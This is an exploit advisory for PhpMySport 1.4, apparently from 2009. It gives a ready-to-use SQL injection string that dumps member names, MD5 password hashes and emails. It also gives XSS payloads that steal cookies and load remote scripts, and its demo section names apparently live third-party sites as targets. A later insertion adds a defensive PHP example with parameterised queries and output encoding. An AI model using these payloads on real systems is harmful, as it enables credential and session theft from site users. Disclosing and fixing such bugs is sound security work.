
PhpMySport 1.4 (XSS/SQL) Multiple Remote Vulnerabilities


(omitted)
#####################################################################
# PhpMySport v. 1.4 Multiple Remote Vulnerabilities (XSS\SQL) #
# ~ Discovered by XaDoS - xados [at] hotmail [dot] it ~ #
# ~ Th4nKs AlpHaNiX ~ #
#####################################################################

-Product site: http://phpmysport.sourceforge.net
-Version vuln: 1.4(latest) and maybe <

[ ] COD3:

The vulnerable code is in the page /member_list.php (SQL)
and in many other pages (XSS), such as
/index.php (v3/4/5/6)

[ ] EXPLoIt:


>>[$QL]<<

The bug is on the search_member page of this script.
You can write some bad SQL code to see the MD5 encrypted password, name and other data of the users. Example:

http://www.example.com/index.php?r=membre&v1=member_list

write in a search_member form:

-999'/**/union/**/all/**/select/**/1,2,3,4,5,6,7,concat(member_firstname,0x3a,member_pass,0x3a,member_email),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/**/from/**/pms_member#

Now you can see the name, password and e-mail of users in the order:

name:password:email

You can also see other information like description, date of connection, country_id, sex, level_id, lastname, date of birth etc.

(this form is vuln to XSS.. try to inject javaScript ;-))



>>[XSS]<<

Some pages are vulnerable,
for example

http://www.example.com/index.php?r=co ... mp;v4=&v5=all&v6=[XSS]

[XSS] = "><script>alert(document.cookie)</script>
or
"><script src="http://www.badsite.com/page.js"></script>
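
Added example (not part of the original advisory and not PhpMySport's own code): a hypothetical hardened member search in PHP showing the two fixes these bugs call for, a bound parameter for the search term and HTML encoding on output. The table and column names come from the advisory; the function names, the in-memory SQLite schema and the sample row are assumptions.

```php
<?php
// Added example: hypothetical hardened member search, not PhpMySport's code.
// Table/column names come from the advisory; schema and row are constructed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE pms_member (member_firstname TEXT, member_pass TEXT, member_email TEXT)');
$db->exec("INSERT INTO pms_member VALUES ('Anna', 'constructed-hash', 'anna@example.com')");

function search_members(PDO $db, string $term): array
{
    // Escape LIKE wildcards so % and _ in user input match literally.
    $like = '%' . addcslashes($term, '\\%_') . '%';
    // The placeholder keeps the term as data: quotes, comments and UNION
    // inside it can never change the structure of the statement.
    $stmt = $db->prepare(
        "SELECT member_firstname FROM pms_member
         WHERE member_firstname LIKE :term ESCAPE '\\'"
    );
    $stmt->execute([':term' => $like]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

function render_results(string $term, array $names): string
{
    // Encode on output: the echoed search term and stored names are untrusted.
    $esc = fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    $html = '<p>Results for "' . $esc($term) . '"</p><ul>';
    foreach ($names as $n) {
        $html .= '<li>' . $esc($n) . '</li>';
    }
    return $html . '</ul>';
}

// Constructed inputs in the style of the advisory's two test strings.
$inputs = [
    'Ann',
    "-999' union all select member_pass from pms_member#",
    '"><script>alert(1)</script>',
];
foreach ($inputs as $term) {
    // Only 'Ann' returns a row; the other two match nothing and are
    // printed back as inert, entity-encoded text.
    echo render_results($term, search_members($db, $term)), PHP_EOL;
}
```

Storing member_pass as unsalted MD5, as the advisory describes, also means any disclosure of that column is quickly reversible; a password hashing function such as PHP's password_hash() limits that impact.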


########::D&m0::########

[SQL]:

http://olmobasket.altervista.org/phpm ... membro&v1=member_list

Write in the search_member form the right query:

-999'/**/union/**/all/**/select/**/1,2,3,4,5,6,7,concat(member_firstname,0x3a,member_pass,0x3a,member_email),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/**/from/**/pms_member#

You will see the name:password:email of victims

[XSS]:

http://phpmysport.sourceforge.net/dem ... t;><script>alert(document.cookie)</script><script src=http://www.securitycode.it/x.js></script>

#############
/.end

"They danced down the streets like dingledodies, and I shambled after as I've been doing all my life after people who interest me, because the only people for me are the mad ones, the ones who are mad to live, mad to talk, mad to be saved, desirous of everything at the same time, the ones who never yawn or say a commonplace thing, but burn, burn, burn like fabulous yellow roman candles exploding like spiders across the stars and in the middle you see the blue centerlight pop and everybody goes "OHooooo!"

<3 Beat Generation (or Byte generation ;-))

[2009-03-12]